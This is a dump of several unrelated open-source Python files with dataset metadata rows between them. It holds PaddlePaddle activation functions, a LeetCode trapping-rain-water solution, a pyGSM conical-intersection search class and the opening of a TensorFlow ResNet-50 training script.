out = F.silu(x) # [ 0.731059, 1.761594, 2.857722, 3.928055 ]
"""
if in_dynamic_mode():
return _C_ops.silu(x)
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'], 'silu')
helper = LayerHelper("silu", **locals())
out = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(type='silu', inputs={'X': x}, outputs={'Out': out})
return out
def softmax(x, axis=-1, dtype=None, name=None):
r"""
This operator implements the softmax layer. The calculation process is as follows:
1. The dimension :attr:`axis` of ``x`` will be permuted to the last.
2. Then ``x`` will be logically flattened to a 2-D matrix. The matrix's second
dimension(row length) is the same as the dimension :attr:`axis` of ``x``,
and the first dimension(column length) is the product of all other dimensions
of ``x``. For each row of the matrix, the softmax operator squashes the
K-dimensional(K is the width of the matrix, which is also the size of ``x``'s
dimension :attr:`axis`) vector of arbitrary real values to a K-dimensional
vector of real values in the range [0, 1] that add up to 1.
3. After the softmax operation is completed, the inverse operations of steps 1 and 2
are performed to restore the two-dimensional matrix to the same dimension as the ``x`` .
It computes the exponential of the given dimension and the sum of exponential
values of all the other dimensions in the K-dimensional vector input.
Then the ratio of the exponential of the given dimension and the sum of
exponential values of all the other dimensions is the output of the softmax
operator.
For each row :math:`i` and each column :math:`j` in the matrix, we have:
.. math::
softmax[i, j] = \frac{\exp(x[i, j])}{\sum_j(exp(x[i, j])}
Example:
.. code-block:: text
Case 1:
Input:
x.shape = [2, 3, 4]
x.data = [[[2.0, 3.0, 4.0, 5.0],
[3.0, 4.0, 5.0, 6.0],
[7.0, 8.0, 8.0, 9.0]],
[[1.0, 2.0, 3.0, 4.0],
[5.0, 6.0, 7.0, 8.0],
[6.0, 7.0, 8.0, 9.0]]]
Attrs:
axis = -1
Output:
out.shape = [2, 3, 4]
out.data = [[[0.0320586 , 0.08714432, 0.23688282, 0.64391426],
[0.0320586 , 0.08714432, 0.23688282, 0.64391426],
[0.07232949, 0.19661193, 0.19661193, 0.53444665]],
[[0.0320586 , 0.08714432, 0.23688282, 0.64391426],
[0.0320586 , 0.08714432, 0.23688282, 0.64391426],
[0.0320586 , 0.08714432, 0.23688282, 0.64391426]]]
Case 2:
Input:
x.shape = [2, 3, 4]
x.data = [[[2.0, 3.0, 4.0, 5.0],
[3.0, 4.0, 5.0, 6.0],
[7.0, 8.0, 8.0, 9.0]],
[[1.0, 2.0, 3.0, 4.0],
[5.0, 6.0, 7.0, 8.0],
[6.0, 7.0, 8.0, 9.0]]]
Attrs:
axis = 1
Output:
out.shape = [2, 3, 4]
out.data = [[[0.00657326, 0.00657326, 0.01714783, 0.01714783],
[0.01786798, 0.01786798, 0.04661262, 0.04661262],
[0.97555875, 0.97555875, 0.93623955, 0.93623955]],
[[0.00490169, 0.00490169, 0.00490169, 0.00490169],
[0.26762315, 0.26762315, 0.26762315, 0.26762315],
[0.72747516, 0.72747516, 0.72747516, 0.72747516]]]
Parameters:
x (Tensor): The input Tensor with data type float32, float64.
axis (int, optional): The axis along which to perform log_softmax
calculations. It should be in range [-D, D), where D is the
dimensions of ``x`` . If ``axis`` < 0, it works the same way as
:math:`axis + D` . Default is -1.
dtype (str, optional): The data type of the output tensor, can be float32, float64.
name (str, optional): Name for the operation (optional, default is None).
For more information, please refer to :ref:`api_guide_Name`.
Returns:
A Tensor with the same shape and data type (use ``dtype`` if it is
specified) as x.
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
import numpy as np
x = np.array([[[2.0, 3.0, 4.0, 5.0],
[3.0, 4.0, 5.0, 6.0],
[7.0, 8.0, 8.0, 9.0]],
[[1.0, 2.0, 3.0, 4.0],
[5.0, 6.0, 7.0, 8.0],
[6.0, 7.0, 8.0, 9.0]]], 'float32')
x = paddle.to_tensor(x)
out1 = F.softmax(x)
out2 = F.softmax(x, dtype='float64')
# out1's data type is float32; out2's data type is float64
# out1 and out2's value is as follows:
# [[[0.0320586 , 0.08714432, 0.23688282, 0.64391426],
# [0.0320586 , 0.08714432, 0.23688282, 0.64391426],
# [0.07232949, 0.19661193, 0.19661193, 0.53444665]],
# [[0.0320586 , 0.08714432, 0.23688282, 0.64391426],
# [0.0320586 , 0.08714432, 0.23688282, 0.64391426],
# [0.0320586 , 0.08714432, 0.23688282, 0.64391426]]]
"""
if (dtype is not None) and (not isinstance(dtype, core.VarDesc.VarType)):
dtype = convert_np_dtype_to_dtype_(dtype)
use_cudnn = True
if in_dynamic_mode():
outs_cast = x if dtype is None \
else _C_ops.cast(x, 'in_dtype', x.dtype, 'out_dtype', dtype)
return _C_ops.softmax(outs_cast, 'axis', axis, 'use_cudnn', use_cudnn)
if dtype is None:
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'],
'softmax')
else:
check_dtype(dtype, 'dtype', ['float32', 'float64'], 'softmax',
'If dtype is not None, it only support float32 or float64.')
helper = LayerHelper("softmax", **locals())
outs_cast = x
if dtype is not None:
outs_cast = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type='cast',
inputs={'X': x},
outputs={'Out': outs_cast},
attrs={'in_dtype': x.dtype,
'out_dtype': dtype})
outs_softmax = helper.create_variable_for_type_inference(outs_cast.dtype)
helper.append_op(
type='softmax',
inputs={'X': outs_cast},
outputs={'Out': outs_softmax},
attrs={'axis': axis,
'use_cudnn': use_cudnn})
return outs_softmax
@inplace_apis_in_dygraph_only
def softmax_(x, axis=-1, dtype=None, name=None):
r"""
Inplace version of ``softmax`` API, the output Tensor will be inplaced with input ``x``.
Please refer to :ref:`api_nn_cn_softmax`.
"""
if (dtype is not None) and (not isinstance(dtype, core.VarDesc.VarType)):
dtype = convert_np_dtype_to_dtype_(dtype)
use_cudnn = True
return _C_ops.softmax_(x, 'axis', axis, 'use_cudnn', use_cudnn)
def softplus(x, beta=1, threshold=20, name=None):
r"""
softplus activation
.. math::
softplus(x) = \frac{1}{beta} * \log(1 + e^{beta * x}) \\
\text{For numerical stability, the implementation reverts to the linear function when: beta * x > threshold.}
Parameters:
x (Tensor): The input Tensor with data type float32, float64.
beta (float, optional): The value of beta for softplus. Default is 1
threshold (float, optional): The value of threshold for softplus. Default is 20
name (str, optional): Name for the operation (optional, default is None).
For more information, please refer to :ref:`api_guide_Name`.
Returns:
A Tensor with the same data type and shape as ``x`` .
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
import numpy as np
x = paddle.to_tensor(np.array([-0.4, -0.2, 0.1, 0.3]))
out = F.softplus(x) # [0.513015, 0.598139, 0.744397, 0.854355]
"""
if in_dynamic_mode():
return _C_ops.softplus(x, 'beta', beta, 'threshold', threshold)
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'],
'softplus')
helper = LayerHelper('softplus', **locals())
out = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(
type='softplus',
inputs={'X': x},
outputs={'Out': out},
attrs={'beta': beta,
'threshold': threshold})
return out
def softshrink(x, threshold=0.5, name=None):
r"""
softshrink activation
.. math::
softshrink(x)=
\left\{
\begin{array}{rcl}
x - threshold,& & \text{if } x > threshold \\
x + threshold,& & \text{if } x < -threshold \\
0,& & \text{otherwise}
\end{array}
\right.
Parameters:
x (Tensor): The input Tensor with data type float32, float64.
threshold (float, optional): The value of threshold(must be no less than zero) for softplus. Default is 0.5
name (str, optional): Name for the operation (optional, default is None).
For more information, please refer to :ref:`api_guide_Name`.
Returns:
A Tensor with the same data type and shape as ``x`` .
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
import numpy as np
x = paddle.to_tensor(np.array([-0.9, -0.2, 0.1, 0.8]))
out = F.softshrink(x) # [-0.4, 0, 0, 0.3]
"""
if threshold < 0:
raise ValueError(
"The threshold must be no less than zero. Received: {}.".format(
threshold))
if in_dynamic_mode():
return _C_ops.softshrink(x, 'lambda', threshold)
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'],
'softshrink')
helper = LayerHelper('softshrink', **locals())
out = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(
type='softshrink',
inputs={'X': x},
outputs={'Out': out},
attrs={'lambda': threshold})
return out
def softsign(x, name=None):
r"""
softsign activation
.. math::
softsign(x) = \frac{x}{1 + |x|}
Parameters:
x (Tensor): The input Tensor with data type float32, float64.
name (str, optional): Name for the operation (optional, default is None).
For more information, please refer to :ref:`api_guide_Name`.
Returns:
A Tensor with the same data type and shape as ``x`` .
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
import numpy as np
x = paddle.to_tensor(np.array([-0.4, -0.2, 0.1, 0.3]))
out = F.softsign(x) # [-0.285714, -0.166667, 0.0909091, 0.230769]
"""
if in_dynamic_mode():
return _C_ops.softsign(x)
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'],
'softsign')
helper = LayerHelper('softsign', **locals())
out = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(type='softsign', inputs={'X': x}, outputs={'Out': out})
return out
def swish(x, name=None):
r"""
swish activation.
.. math::
swish(x) = \frac{x}{1 + e^{-x}}
Parameters:
x (Tensor): The input Tensor with data type float32, float64.
name (str, optional): Name for the operation (optional, default is None).
For more information, please refer to :ref:`api_guide_Name`.
Returns:
A Tensor with the same data type and shape as ``x`` .
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
import numpy as np
x = paddle.to_tensor(np.array([-2., 0., 1.]))
out = F.swish(x) # [-0.238406, 0., 0.731059]
"""
if in_dynamic_mode():
return _C_ops.swish(x, 'beta', 1.0)
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'], 'swish')
helper = LayerHelper('swish', **locals())
out = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(
type='swish',
inputs={'X': x},
outputs={'Out': out},
attrs={'beta': 1.0})
return out
def mish(x, name=None):
r"""
mish activation.
.. math::
softplus(x) = \begin{cases}
x, \text{if } x > \text{threshold} \\
\ln(1 + e^{x}), \text{otherwise}
\end{cases}
mish(x) = x * \tanh(softplus(x))
Parameters:
x (Tensor): The input Tensor with data type float32, float64.
name (str, optional): Name for the operation (optional, default is None).
For more information, please refer to :ref:`api_guide_Name`.
Returns:
A Tensor with the same data type and shape as ``x`` .
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
x = paddle.to_tensor([-5., 0., 5.])
out = F.mish(x) # [-0.03357624, 0., 4.99955208]
"""
if in_dynamic_mode():
return _C_ops.mish(x)
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'], 'mish')
helper = LayerHelper('mish', **locals())
out = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(type='mish', inputs={'X': x}, outputs={'Out': out})
return out
def tanhshrink(x, name=None):
"""
tanhshrink activation
.. math::
tanhshrink(x) = x - tanh(x)
Args:
x (Tensor): The input Tensor with data type float32, float64.
name (str, optional): Name for the operation (optional, default is None).
For more information, please refer to :ref:`api_guide_Name`.
Returns:
A Tensor with the same data type and shape as ``x`` .
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
import numpy as np
x = paddle.to_tensor(np.array([-0.4, -0.2, 0.1, 0.3]))
out = F.tanhshrink(x) # [-0.020051, -0.00262468, 0.000332005, 0.00868739]
"""
if in_dynamic_mode():
return _C_ops.tanh_shrink(x)
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'],
'tanhshrink')
helper = LayerHelper('tanh_shrink', **locals())
out = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(type='tanh_shrink', inputs={'X': x}, outputs={'Out': out})
return out
def thresholded_relu(x, threshold=1.0, name=None):
r"""
thresholded relu activation.
.. math::
thresholded\_relu(x) =
\left\{
\begin{array}{rl}
x,& \text{if } \ x > threshold \\
0,& \text{otherwise}
\end{array}
\right.
Parameters:
x (Tensor): The input Tensor with data type float32, float64.
threshold (float, optional): The value of threshold for thresholded_relu. Default is 1.0
name (str, optional): Name for the operation (optional, default is None).
For more information, please refer to :ref:`api_guide_Name`.
Returns:
A Tensor with the same data type and shape as ``x`` .
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
import numpy as np
x = paddle.to_tensor(np.array([2., 0., 1.]))
out = F.thresholded_relu(x) # [2., 0., 0.]
"""
if in_dynamic_mode():
return _C_ops.thresholded_relu(x, 'threshold', threshold)
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'],
'thresholded_relu')
helper = LayerHelper('thresholded_relu', **locals())
out = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(
type='thresholded_relu',
inputs={'X': x},
outputs={'Out': out},
attrs={'threshold': threshold})
return out
def log_softmax(x, axis=-1, dtype=None, name=None):
r"""
This operator implements the log_softmax layer. The calculation process is
as follows:
.. math::
\begin{aligned}
log\_softmax[i, j] &= log(softmax(x)) \\
&= log(\frac{\exp(X[i, j])}{\sum_j(\exp(X[i, j])})
\end{aligned}
Parameters:
x (Tensor): The input Tensor with data type float32, float64.
axis (int, optional): The axis along which to perform log_softmax
calculations. It should be in range [-D, D), where D is the
dimensions of ``x`` . If ``axis`` < 0, it works the same way as
:math:`axis + D` . Default is -1.
dtype (str|np.dtype|core.VarDesc.VarType, optional): The desired data
type of the output tensor. If dtype is specified, ``x`` is casted
to ``dtype`` before the operation is performed. This is useful for
preventing data type overflows. Supported dtype: float32, float64.
If ``dtype`` is None, the output Tensor has the same dtype as x.
Default is None.
name (str, optional): Name for the operation (optional, default is None).
For more information, please refer to :ref:`api_guide_Name`.
Returns:
A Tensor with the same shape and data type (use ``dtype`` if it is
specified) as x.
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
x = [[[-2.0, 3.0, -4.0, 5.0],
[3.0, -4.0, 5.0, -6.0],
[-7.0, -8.0, 8.0, 9.0]],
[[1.0, -2.0, -3.0, 4.0],
[-5.0, 6.0, 7.0, -8.0],
[6.0, 7.0, 8.0, 9.0]]]
x = paddle.to_tensor(x)
out1 = F.log_softmax(x)
out2 = F.log_softmax(x, dtype='float64')
# out1's data type is float32; out2's data type is float64
# out1 and out2's value is as follows:
# [[[ -7.1278396 -2.1278396 -9.127839 -0.12783948]
# [ -2.1270514 -9.127051 -0.12705144 -11.127051 ]
# [-16.313261 -17.313261 -1.3132617 -0.31326184]]
# [[ -3.0518122 -6.051812 -7.051812 -0.051812 ]
# [-12.313267 -1.3132664 -0.3132665 -15.313267 ]
# [ -3.4401896 -2.4401896 -1.4401896 -0.44018966]]]
"""
if (dtype is not None) and (not isinstance(dtype, core.VarDesc.VarType)):
dtype = convert_np_dtype_to_dtype_(dtype)
if in_dynamic_mode():
if dtype is not None:
x = _C_ops.cast(x, 'in_dtype', x.dtype, 'out_dtype', dtype)
return _C_ops.log_softmax(x, 'axis', axis)
if dtype is None:
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'],
'log_softmax')
else:
check_dtype(dtype, 'dtype', ['float32', 'float64'], 'log_softmax',
'If dtype is not None, it only support float32 or float64.')
helper = LayerHelper("log_softmax", **locals())
out_cast = x
if dtype is not None:
out_cast = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type='cast',
inputs={'X': x},
outputs={'Out': out_cast},
attrs={'in_dtype': x.dtype,
'out_dtype': dtype})
out = helper.create_variable_for_type_inference(out_cast.dtype)
helper.append_op(
type='log_softmax',
inputs={'X': out_cast},
outputs={'Out': out},
attrs={'axis': axis})
return out
def glu(x, axis=-1, name=None):
r"""
The gated linear unit. The input is evenly splited into 2 parts along a
given axis. The first part is used as the content, and the second part is
passed through a sigmoid function then used as the gate. The output is a
elementwise multiplication of the content and the gate.
.. math::
\mathrm{GLU}(a, b) = a \otimes \sigma(b)
Parameters:
x (Tensor): The input Tensor with data type float32, float64.
axis (int, optional): The axis along which split the input tensor. It
should be in range [-D, D), where D is the dimensions of ``x`` .
If ``axis`` < 0, it works the same way as :math:`axis + D` .
Default is -1.
name (str, optional): Name for the operation (optional, default is None).
For more information, please refer to :ref:`api_guide_Name`.
Returns:
A Tensor with the same data type as x. The size of the given aixs is
halved.
Examples:
.. code-block:: python
import paddle
from paddle.nn import functional as F
x = paddle.to_tensor(
[[-0.22014759, -1.76358426, 0.80566144, 0.04241343],
[-1.94900405, -1.89956081, 0.17134808, -1.11280477]]
)
print(F.glu(x).numpy())
# array([[-0.15216254, -0.9004892 ],
# [-1.0577879 , -0.46985325]], dtype=float32)
"""
check_variable_and_dtype(x, 'input', ['float16', 'float32', 'float64'],
"glu")
a, b = chunk(x, 2, axis=axis, name=name)
gate = sigmoid(b, name=name)
out = paddle.multiply(a, gate, name=name)
return out
def gumbel_softmax(x, temperature=1.0, hard=False, axis=-1, name=None):
r"""
Samples from the Gumbel-Softmax distribution and optionally discretizes.
temperature is denoted by t. The calculation process is as follows:
First, generate gumbel noise:
.. math::
G_i = -log(-log(U_i)), U_i \sim U(0,1)
Second, add noise to ``x``:
.. math::
v = [x_1 + G_1,...,x_n + G_n]
Finally, calculate gumbel_softmax and generate samples:
.. math::
gumbel\_softmax(v_i)=\frac{e^{v_i/t}}{\sum_{j=1}^n{e^{v_j/t}}},i=1,2,3...n
Parameters:
x (Tensor): An N-D Tensor, the first N - 1 dimensions index into a batch
of independent distributions and the last dimension represents
a vector of probabilities with datatype float32, float64.
temperature (float, optional): non-negative scalar temperature.
Default is 1.0.
hard (bool, optional): if True, the returned samples will be discretized as
one-hot vectors, but will be differentiated as if it is the soft sample
in autograd. Default is False.
axis (int, optional): The axis along will be calculated softmax value.
Default is -1.
name (str, optional): Name for the operation (optional, default is None).
For more information, please refer to :ref:`api_guide_Name`.
Returns:
Sampled tensor of same shape as ``x`` from the Gumbel-Softmax distribution.
If ``hard = True``, the returned samples will be one-hot, otherwise they will be
probability distributions that sum to 1 across ``axis``.
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
logits = paddle.randn([4, 6])
temperature = 0.01
gumbel_softmax = F.gumbel_softmax(logits, temperature)
print(gumbel_softmax)
# out's value is as follows:
# [[0.00000001, 1. , 0.00000000, 0.00000000, 0.00000006, 0.00000000],
# [0.00000000, 0.00000000, 0.00000000, 0.00000000, 0.00000000, 1. ],
# [0.00000062, 0.00000000, 0.00000000, 0.00000000, 0.00000000, 0.99999940],
# [0.00000000, 0.00000000, 0.00000000, 0.00001258, 0.99998736, 0.00000000]]
"""
if in_dynamic_mode():
return _C_ops.gumbel_softmax(x, 'temperature', temperature, 'hard',
hard, 'axis', axis)
helper = LayerHelper("gumbel_softmax", **locals())
check_variable_and_dtype(x, 'x', ['float32', 'float64'], 'gumbel_softmax')
out = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(
type='gumbel_softmax',
inputs={'X': x},
outputs={'Out': out},
attrs={'temperature': temperature,
'hard': hard,
'axis': axis})
return out
| 33.768116
| 133
| 0.556828
|
794e267eeef55a48466cf579457b30cc905c49e3
| 6,256
|
py
|
Python
|
pygsm/growing_string_methods/se_cross.py
|
espottesmith/pyGSM
|
5bf263f9ef6cbee3ec16355c5eb1839446e704e7
|
[
"MIT"
] | null | null | null |
pygsm/growing_string_methods/se_cross.py
|
espottesmith/pyGSM
|
5bf263f9ef6cbee3ec16355c5eb1839446e704e7
|
[
"MIT"
] | null | null | null |
pygsm/growing_string_methods/se_cross.py
|
espottesmith/pyGSM
|
5bf263f9ef6cbee3ec16355c5eb1839446e704e7
|
[
"MIT"
] | null | null | null |
from __future__ import print_function
# standard library imports
import sys
import os
from os import path
# third party
import numpy as np
# local application imports
sys.path.append(path.dirname( path.dirname( path.abspath(__file__))))
from utilities import *
from wrappers import Molecule
from .base_gsm import Base_Method
from .se_gsm import SE_GSM
from potential_energy_surfaces import Avg_PES
class SE_Cross(SE_GSM):
def go_gsm(self,max_iters=50,opt_steps=3,rtype=0):
"""rtype=0 MECI search
rtype=1 MESX search
"""
assert rtype in [0,1], "rtype not defined"
if rtype==0:
nifty.printcool("Doing SE-MECI search")
else:
nifty.printcool("Doing SE-MESX search")
self.nodes[0].gradrms=0.
self.nodes[0].V0 = self.nodes[0].energy
print(' Initial energy is {:1.4f}'.format(self.nodes[0].energy))
sys.stdout.flush()
# stash bdist for node 0
_,self.nodes[0].bdist = Base_Method.tangent(self.nodes[0],None,driving_coords=self.driving_coords)
print(" Initial bdist is %1.3f" %self.nodes[0].bdist)
# interpolate first node
self.add_GSM_nodeR()
# grow string
self.growth_iters(iters=max_iters,maxopt=opt_steps,nconstraints=1)
print(' SE_Cross growth phase over')
print(' Warning last node still not fully optimized')
if True:
# doing extra constrained penalty optimization for MECI
print(" extra constrained optimization for the nnR-1 = %d" % (self.nR-1))
self.optimizer[self.nR-1].conv_grms=0.01
ictan,_ = Base_Method.tangent(self.nodes[self.nR-1],self.nodes[self.nR-2])
self.nodes[self.nR-1].PES.sigma=3.5
self.optimizer[self.nR-1].optimize(
molecule=self.nodes[self.nR-1],
refE=self.nodes[0].V0,
opt_type='ICTAN',
opt_steps=50,
ictan=ictan,
)
self.optimizer[self.nR].opt_cross=True
if rtype==0:
# MECI optimization
self.write_xyz_files(iters=1,base="after_penalty",nconstraints=1)
self.nodes[self.nR] = Molecule.copy_from_options(self.nodes[self.nR-1],new_node_id=self.nR)
self.nodes[self.nR].PES.lot.do_coupling=True
avg_pes = Avg_PES.create_pes_from(self.nodes[self.nR].PES)
self.nodes[self.nR].PES = avg_pes
self.optimizer[self.nR].conv_grms=self.options['CONV_TOL']
self.optimizer[self.nR].optimize(
molecule=self.nodes[self.nR],
refE=self.nodes[0].V0,
opt_type='MECI',
opt_steps=100,
)
self.write_xyz_files(iters=1,base="grown_string",nconstraints=1)
else:
# unconstrained penalty optimization
#TODO make unctonstrained "CROSSING" which checks for dE convergence
self.nodes[self.nR] = Molecule.copy_from_options(self.nodes[self.nR-1],new_node_id=self.nR)
self.nodes[self.nR].PES.sigma = 10.0
print(" sigma for node %d is %.3f" %(self.nR,self.nodes[self.nR].PES.sigma))
self.optimizer[self.nR].opt_cross=True
self.optimizer[self.nR].conv_grms=self.options['CONV_TOL']
self.optimizer[self.nR].optimize(
molecule=self.nodes[self.nR],
refE=self.nodes[0].V0,
opt_type='UNCONSTRAINED',
opt_steps=100,
)
self.write_xyz_files(iters=1,base="grown_string",nconstraints=1)
tmp = []
for n in range(self.nnodes):
tmp.append(self.energies[n])
self.energies = np.asarray(tmp)
def converged(self,n,opt_type):
if opt_type=="UNCSONTRAINED":
tmp1 = np.copy(self.nodes[n].PES.grad1)
tmp2 = np.copy(self.nodes[n].PES.grad2)
print('norm1: {:1.4f} norm2: {:1.4f}'.format(np.linalg.norm(tmp1),np.linalg.norm(tmp2)))
print('ratio: {:1.4f}'.format(np.linalg.norm(tmp1)/np.linalg.norm(tmp2)))
tmp1 = tmp1/np.linalg.norm(tmp1)
tmp2 = tmp2/np.linalg.norm(tmp2)
print('normalized gradient dot product:',float(np.dot(tmp1.T,tmp2)))
sys.stdout.flush()
if self.nodes[n].gradrms<self.options['CONV_TOL'] and 1.-abs(float(np.dot(tmp1.T,tmp2))) <= 0.02 and abs(self.nodes[n].PES.dE) <= 1.25:
return True
else:
return False
elif opt_type=="ICTAN": #constrained growth
if self.nodes[n].gradrms<self.optimizer[n].conv_grms:
return True
else:
return False
elif opt_type=="MECI":
if self.nodes[n].gradrms<self.options['CONV_TOL'] and abs(self.nodes[n].PES.dE) <= 1.0:
return True
else:
return False
def check_if_grown(self):
isDone = False
epsilon = 1.5
pes1dE = self.nodes[self.nR-1].PES.dE
pes2dE = self.nodes[self.nR-2].PES.dE
condition1 = (abs(self.nodes[self.nR-1].bdist) <=(1-self.BDIST_RATIO)*abs(self.nodes[0].bdist) and (abs(pes1dE) > abs(pes2dE)))
condition2= ((self.nodes[self.nR-1].bdist+0.1>self.nodes[self.nR-2].bdist) and (1-self.BDIST_RATIO)*abs(self.nodes[0].bdist))
if condition1:
print(" Condition 1 satisfied")
print(" bdist current %1.3f" % abs(self.nodes[self.nR-1].bdist))
print(" bdist target %1.3f" % (abs(self.nodes[0].bdist)*(1-self.BDIST_RATIO)))
print(" Growth-phase over")
isDone=True
#elif condition2:
# print(" Condition 2 satisfied")
# print(" Growth-phase over")
# isDone = True
return isDone
def restart_string(self,xyzfile='restart.xyz'):
super(SE_Cross,self).restart_string(xyzfile)
self.done_growing=False
self.nnodes=20
self.nR -=1
# stash bdist for node 0
_,self.nodes[0].bdist = Base_Method.tangent(self.nodes[0],None,driving_coords=self.driving_coords)
| 40.623377
| 147
| 0.585997
|
794e276fadef10163df8a726e8bcca57f0c8dfc8
| 438
|
py
|
Python
|
CONTENT/DS-n-Algos/ALGO/_LEETCODE/042_trapping_rain_water/42.py
|
impastasyndrome/DS-ALGO-OFFICIAL
|
c85ec9cf0af0009f038b7a571a7ac1fb466b7f3a
|
[
"Apache-2.0"
] | 13
|
2021-03-11T00:25:22.000Z
|
2022-03-19T00:19:23.000Z
|
CONTENT/DS-n-Algos/ALGO/_LEETCODE/042_trapping_rain_water/42.py
|
impastasyndrome/DS-ALGO-OFFICIAL
|
c85ec9cf0af0009f038b7a571a7ac1fb466b7f3a
|
[
"Apache-2.0"
] | 162
|
2021-03-09T01:52:11.000Z
|
2022-03-12T01:09:07.000Z
|
CONTENT/DS-n-Algos/ALGO/_LEETCODE/042_trapping_rain_water/42.py
|
impastasyndrome/DS-ALGO-OFFICIAL
|
c85ec9cf0af0009f038b7a571a7ac1fb466b7f3a
|
[
"Apache-2.0"
] | 12
|
2021-04-26T19:43:01.000Z
|
2022-01-31T08:36:29.000Z
|
class Solution:
def trap(self, height: "List[int]") -> "int":
result = 0
stack = []
for i in range(len(height)):
while stack and height[i] > height[stack[-1]]:
pre = stack.pop()
if stack:
h = min(height[stack[-1]], height[i])
result += (h - height[pre]) * (i - 1 - stack[-1])
stack.append(i)
return result
| 33.692308
| 69
| 0.440639
|
794e28503fcea03264b036cb01d22cdfbc53f4d8
| 32,394
|
py
|
Python
|
models/official/resnet/resnet_main_onecycle.py
|
henryqin1997/tpu
|
cf7f26bb3d2bdfa71652f0e216be35a2393ff7ef
|
[
"Apache-2.0"
] | null | null | null |
models/official/resnet/resnet_main_onecycle.py
|
henryqin1997/tpu
|
cf7f26bb3d2bdfa71652f0e216be35a2393ff7ef
|
[
"Apache-2.0"
] | null | null | null |
models/official/resnet/resnet_main_onecycle.py
|
henryqin1997/tpu
|
cf7f26bb3d2bdfa71652f0e216be35a2393ff7ef
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Train a ResNet-50 model on ImageNet on TPU."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import time
from absl import app
from absl import flags
from absl import logging
import numpy as np
import tensorflow.compat.v1 as tf
import tensorflow.compat.v2 as tf2
import myWeightedLoss
from common import inference_warmup
from common import tpu_profiler_hook
from hyperparameters import common_hparams_flags
from hyperparameters import common_tpu_flags
from hyperparameters import flags_to_params
from hyperparameters import params_dict
from official.resnet import imagenet_input
from official.resnet import lars_util_onecycle
from official.resnet import resnet_model
from official.resnet.configs import resnet_config
from official.resnet import onecycle
from tensorflow.core.protobuf import rewriter_config_pb2 # pylint: disable=g-direct-tensorflow-import
common_tpu_flags.define_common_tpu_flags()
common_hparams_flags.define_common_hparams_flags()
FLAGS = flags.FLAGS
FAKE_DATA_DIR = 'gs://cloud-tpu-test-datasets/fake_imagenet'
flags.DEFINE_integer(
'resnet_depth', default=None,
help=('Depth of ResNet model to use. Must be one of {18, 34, 50, 101, 152,'
' 200}. ResNet-18 and 34 use the pre-activation residual blocks'
' without bottleneck layers. The other models use pre-activation'
' bottleneck layers. Deeper models require more training time and'
' more memory and may require reducing --train_batch_size to prevent'
' running out of memory.'))
flags.DEFINE_integer(
'num_train_images', default=None, help='Size of training data set.')
flags.DEFINE_integer(
'num_eval_images', default=None, help='Size of evaluation data set.')
flags.DEFINE_integer(
'num_label_classes', default=None, help='Number of classes, at least 2')
flags.DEFINE_string(
'data_format', default=None,
help=('A flag to override the data format used in the model. The value'
' is either channels_first or channels_last. To run the network on'
' CPU or TPU, channels_last should be used. For GPU, channels_first'
' will improve performance.'))
flags.DEFINE_bool(
'transpose_input', default=None,
help='Use TPU double transpose optimization')
flags.DEFINE_bool(
'use_cache', default=None, help=('Enable cache for training input.'))
flags.DEFINE_integer('image_size', None, 'The input image size.')
flags.DEFINE_string(
'dropblock_groups', None,
help=('A string containing comma separated integers indicating ResNet '
'block groups to apply DropBlock. `3,4` means to apply DropBlock to '
'block groups 3 and 4. Use an empty string to not apply DropBlock to '
'any block group.'))
flags.DEFINE_float(
'dropblock_keep_prob', default=None,
help=('keep_prob parameter of DropBlock. Will not be used if '
'dropblock_groups is empty.'))
flags.DEFINE_integer(
'dropblock_size', default=None,
help=('size parameter of DropBlock. Will not be used if dropblock_groups '
'is empty.'))
flags.DEFINE_boolean(
'pre_activation', default=None,
help=('Whether to use pre-activation ResNet (ResNet-v2)'))
flags.DEFINE_string(
'norm_act_layer', default=None,
help='One of {"bn_relu", "evonorm_b0", "evonorm_s0"}.')
flags.DEFINE_integer(
'profile_every_n_steps', default=0,
help=('Number of steps between collecting profiles if larger than 0'))
flags.DEFINE_string(
'mode', default='train_and_eval',
help='One of {"train_and_eval", "train", "eval"}.')
flags.DEFINE_integer(
'steps_per_eval', default=1251,
help=('Controls how often evaluation is performed. Since evaluation is'
' fairly expensive, it is advised to evaluate as infrequently as'
' possible (i.e. up to --train_steps, which evaluates the model only'
' after finishing the entire training regime).'))
flags.DEFINE_integer(
'eval_timeout',
default=None,
